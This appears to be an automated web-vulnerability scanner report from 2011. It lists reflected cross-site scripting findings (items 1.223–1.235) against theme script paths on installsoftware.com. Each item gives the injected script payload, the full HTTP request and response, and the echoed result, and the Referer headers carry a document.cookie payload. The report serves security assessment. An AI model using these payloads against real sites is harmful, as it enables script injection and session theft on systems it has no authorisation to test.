<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-contentf8df1\"><script>alert(1)</script>df54dde89f2/themes/rt_mynxx_wp/js/mootools.bgiframe.js" type="hidden" />
...[SNIP]...

1.223. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/mootools.bgiframe.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/js/mootools.bgiframe.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 63f41"><script>alert(1)</script>65897b2ba3e was submitted in the REST URL parameter 2. This input was echoed as 63f41\"><script>alert(1)</script>65897b2ba3e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes63f41"><script>alert(1)</script>65897b2ba3e/rt_mynxx_wp/js/mootools.bgiframe.js HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:17:13 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:17:13 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44397

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/themes63f41\"><script>alert(1)</script>65897b2ba3e/rt_mynxx_wp/js/mootools.bgiframe.js" type="hidden" />
...[SNIP]...

1.224. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/mootools.bgiframe.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/js/mootools.bgiframe.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7a58c"><script>alert(1)</script>ebe51364ac1 was submitted in the REST URL parameter 3. This input was echoed as 7a58c\"><script>alert(1)</script>ebe51364ac1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes/rt_mynxx_wp7a58c"><script>alert(1)</script>ebe51364ac1/js/mootools.bgiframe.js HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:17:24 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:17:25 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44397

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp7a58c\"><script>alert(1)</script>ebe51364ac1/js/mootools.bgiframe.js" type="hidden" />
...[SNIP]...

1.225. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/mootools.bgiframe.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/js/mootools.bgiframe.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c76b4"><script>alert(1)</script>88ae0b76c7 was submitted in the REST URL parameter 4. This input was echoed as c76b4\"><script>alert(1)</script>88ae0b76c7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes/rt_mynxx_wp/jsc76b4"><script>alert(1)</script>88ae0b76c7/mootools.bgiframe.js HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:17:36 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:17:36 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44395

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/jsc76b4\"><script>alert(1)</script>88ae0b76c7/mootools.bgiframe.js" type="hidden" />
...[SNIP]...

1.226. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/mootools.bgiframe.js [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/js/mootools.bgiframe.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ad4c8"><script>alert(1)</script>947ed6e118b was submitted in the REST URL parameter 5. This input was echoed as ad4c8\"><script>alert(1)</script>947ed6e118b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes/rt_mynxx_wp/js/mootools.bgiframe.jsad4c8"><script>alert(1)</script>947ed6e118b HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:17:47 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:17:48 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44397

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/mootools.bgiframe.jsad4c8\"><script>alert(1)</script>947ed6e118b" type="hidden" />
...[SNIP]...

1.227. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/mootools.bgiframe.js [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/js/mootools.bgiframe.js

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b497c"><script>alert(1)</script>b8f47762f1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b497c\"><script>alert(1)</script>b8f47762f1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes/rt_mynxx_wp/js/mootools.bgiframe.js?b497c"><script>alert(1)</script>b8f47762f1=1 HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:15:19 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:15:21 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44430

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/mootools.bgiframe.js?b497c\"><script>alert(1)</script>b8f47762f1=1" type="hidden" />
...[SNIP]...

1.228. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/mootools.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/js/mootools.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4b04e"><script>alert(1)</script>f1d8e19c41e was submitted in the REST URL parameter 1. This input was echoed as 4b04e\"><script>alert(1)</script>f1d8e19c41e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content4b04e"><script>alert(1)</script>f1d8e19c41e/themes/rt_mynxx_wp/js/mootools.js HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:17:01 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:17:02 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44379

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content4b04e\"><script>alert(1)</script>f1d8e19c41e/themes/rt_mynxx_wp/js/mootools.js" type="hidden" />
...[SNIP]...

1.229. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/mootools.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/js/mootools.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aae8c"><script>alert(1)</script>373a71fb8c9 was submitted in the REST URL parameter 2. This input was echoed as aae8c\"><script>alert(1)</script>373a71fb8c9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themesaae8c"><script>alert(1)</script>373a71fb8c9/rt_mynxx_wp/js/mootools.js HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:17:24 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:17:25 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44379

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/themesaae8c\"><script>alert(1)</script>373a71fb8c9/rt_mynxx_wp/js/mootools.js" type="hidden" />
...[SNIP]...

1.230. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/mootools.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/js/mootools.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d4663"><script>alert(1)</script>c19256b1321 was submitted in the REST URL parameter 3. This input was echoed as d4663\"><script>alert(1)</script>c19256b1321 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes/rt_mynxx_wpd4663"><script>alert(1)</script>c19256b1321/js/mootools.js HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:17:48 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:17:48 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44379

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/themes/rt_mynxx_wpd4663\"><script>alert(1)</script>c19256b1321/js/mootools.js" type="hidden" />
...[SNIP]...

1.231. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/mootools.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/js/mootools.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 698f7"><script>alert(1)</script>7b051221727 was submitted in the REST URL parameter 4. This input was echoed as 698f7\"><script>alert(1)</script>7b051221727 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes/rt_mynxx_wp/js698f7"><script>alert(1)</script>7b051221727/mootools.js HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:18:11 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:18:11 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44379

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js698f7\"><script>alert(1)</script>7b051221727/mootools.js" type="hidden" />
...[SNIP]...

1.232. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/mootools.js [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/js/mootools.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 610e3"><script>alert(1)</script>9e4f995fd8 was submitted in the REST URL parameter 5. This input was echoed as 610e3\"><script>alert(1)</script>9e4f995fd8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes/rt_mynxx_wp/js/mootools.js610e3"><script>alert(1)</script>9e4f995fd8 HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:18:34 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:18:34 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44377

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/mootools.js610e3\"><script>alert(1)</script>9e4f995fd8" type="hidden" />
...[SNIP]...

1.233. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/mootools.js [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/js/mootools.js

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6cbfe"><script>alert(1)</script>a2e2aad63fc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6cbfe\"><script>alert(1)</script>a2e2aad63fc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes/rt_mynxx_wp/js/mootools.js?6cbfe"><script>alert(1)</script>a2e2aad63fc=1 HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:15:19 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:15:21 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44414

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/mootools.js?6cbfe\"><script>alert(1)</script>a2e2aad63fc=1" type="hidden" />
...[SNIP]...

1.234. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/rokbox.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/js/rokbox/rokbox.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f9ae7"><script>alert(1)</script>bc045cc4635 was submitted in the REST URL parameter 1. This input was echoed as f9ae7\"><script>alert(1)</script>bc045cc4635 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-contentf9ae7"><script>alert(1)</script>bc045cc4635/themes/rt_mynxx_wp/js/rokbox/rokbox.js HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:18:11 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:18:12 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44389

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-contentf9ae7\"><script>alert(1)</script>bc045cc4635/themes/rt_mynxx_wp/js/rokbox/rokbox.js" type="hidden" />
...[SNIP]...

1.235. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/rokbox.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/js/rokbox/rokbox.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c3d30"><script>alert(1)</script>d127e7741ba was submitted in the REST URL parameter 2. This input was echoed as c3d30\"><script>alert(1)</script>d127e7741ba in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themesc3d30"><script>alert(1)</script>d127e7741ba/rt_mynxx_wp/js/rokbox/rokbox.js HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: */*
